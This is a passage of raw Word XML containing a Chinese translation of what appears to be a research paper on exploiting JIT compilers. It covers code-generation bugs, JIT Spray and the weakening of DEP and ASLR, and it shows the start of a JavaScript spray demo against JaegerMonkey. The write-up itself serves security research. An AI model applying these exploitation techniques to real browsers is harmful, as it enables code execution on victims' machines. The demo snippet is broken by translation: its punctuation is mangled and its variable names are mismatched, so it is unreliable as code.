        <w:t>位加载到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>RFLAGS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53275C15" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2804688C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="134" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="527"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>意外的代码序列将堆栈指针移位常量0xffffff2b，而不是将0xffffff2b加到rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>的值</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>此漏洞可能导致有趣的场景，其中堆栈已移至攻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>击者控制的数据。随后使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用堆栈指针可能导致任意代码执行，而无</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>需其他内存损坏</w:t>
      </w:r>
      <w:commentRangeStart w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:commentRangeEnd w:id="8"/>
      <w:r w:rsidR="004D275C">
        <w:rPr>
          <w:rStyle w:val="a5"/>
        </w:rPr>
        <w:commentReference w:id="8"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2B914F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="29"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E72645B" w14:textId="1BC701A7" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这些不正确的JIT代码</w:t>
      </w:r>
      <w:r w:rsidR="004D275C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>示例表明，JIT引擎可能是漏洞的来源，而不仅仅是利用它们的一种手段。这些漏洞中的一些实质上将执行移交给了替代代码路径。面对允许任意重定向执行方向的漏洞，保护机制可能会突然失去所有价值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4580DD09" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BAC8446" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="438"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>不幸的是，大多数这些代码发布错误并未被供应商标记为与安全相关。传统上，它们一直是程序正确性的问题，而剩下的代码则会对未定义的行为施加偶然性。这符合过去对编译器的期望。但是，如今将高级语言（例如JavaScript）作为一种代码交付媒介，以及对与体系结构无关的位代码格式的日益增长的需求，将处理不善的未定义行为和实际代码生成错误的问题转移到了真正的安全问题上，值得我们进一步研究。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>仔细检查</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245B61C0" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60C1C104" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_bookmark8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用基元</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04168E20" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="38"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705702AA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="529"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>由于不受限制的页面权限以及从不受信任来源</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>生成本机代码</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的影响，JIT引擎引入了许多可能的利用原语。本文中讨论的利用原语提出了一些问题，这些问题涉及到面对其功能</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>集直接</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>否定其目的的组件，内存保护机制的工作情况如何。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550E37EE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="29"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D848F30" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="368"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2010年，Dionysus </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Blazakis在BlackHat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DC上发表了一篇论文，他介绍了一种名为JIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Spray</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>的技术</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>6]。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>该技术涉及将ActionScript馈送给Adobe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Flash Player </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VM，后者通过将攻击者控制的常量进行XOR运算来包含它们</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后，这个简单的代码被JIT转换为本地代码，并产生了许多本地XOR指令，这些指令在用户提供的常量上进行操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0175E33B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="621"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>当将这些常量解释为x86指令时，可以将它们作为shellcode串在一起，以利用内存损坏漏洞。据报道，这种技术是在</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>迪</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>翁（Dion）发表演讲之前私下讨论的，但这是有关该主题的首次公开演讲，为安全研究界对该主题的更广泛探索打开了大门。我们调查的许多JIT引擎（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>TraceMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，LLVM，Java）仍然允许该技术起作用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229B0A27" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E14B18" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="435"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>现代操作系统采用多种不同的内存保护技术来阻止内存破坏漏洞。最主要且最有效的两个保护是W ^ X / DEP和ASLR。 W ^ X或DEP（数据执行保护）旨在防止内存</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>页同时</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可写和</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执行。 ASLR（地址空间布局随机化）将存储部分的基地址随机化，以增加预测目标地址的难度。当这两种保护机制结合在一起时，它们提供了一个合理安全的进程环境，并通过内存破坏漏洞降低了攻击者执行任意代码的几率。漏洞利用开发的当前趋势倾向于使用多个漏洞来实现代码执行。这通常意味着攻击者必须拥有内存损坏漏洞和信息泄漏才能可靠利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0A9D4A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0840FF9C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409AA5B1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="92" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JIT的某些功能会削弱这些技术提供的保护。本文的本节专门探讨这些功能，它们如何对整体较弱的流程安全性模型做出贡献以及如何将其用作开发原语。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D33C9D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC9072F" w14:textId="0C9FC21B" w:rsidR="0026102A" w:rsidRPr="00A5797A" w:rsidRDefault="00A5797A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_bookmark9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JIT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Spray</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34258019" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="39"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DB019BF" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们通过识别使用JIT引擎的已知利用技术，开始了对JIT利用原语的研究。如前所述，JIT Spray技术是第一个要记录的可靠技术。证明此技术对其他JIT引擎有效，突显了对此防御的需求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D885FD" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1898E6F9" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="1568"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>以下JavaScript演示了攻击JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JIT引擎的可行性</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE18A71" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3388DC6E" w14:textId="6322FCDF" w:rsidR="0026102A" w:rsidRDefault="004D275C">
      <w:pPr>
        <w:spacing w:line="290" w:lineRule="auto"/>
        <w:ind w:left="1888" w:right="3519" w:hanging="1729"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> constants</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>= [0x12424242</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0x23434343</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0x34444444</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0x45454545</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0x56464646</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0x67474747</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0x78484848</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">/ test </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/]</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="247D3776" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47B34B7A" w14:textId="77777777" w:rsidR="004D275C" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="1" w:line="290" w:lineRule="auto"/>
        <w:ind w:left="544" w:right="7744" w:hanging="385"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>vals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="72C578FD" w14:textId="0844851C" w:rsidR="0026102A" w:rsidRDefault="00691AB9" w:rsidP="004D275C">
      <w:pPr>
        <w:spacing w:before="1" w:line="290" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="220" w:right="7744" w:firstLineChars="200" w:firstLine="320"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>vals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBF7AEC" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="162" w:lineRule="exact"/>
        <w:ind w:left="160"/>
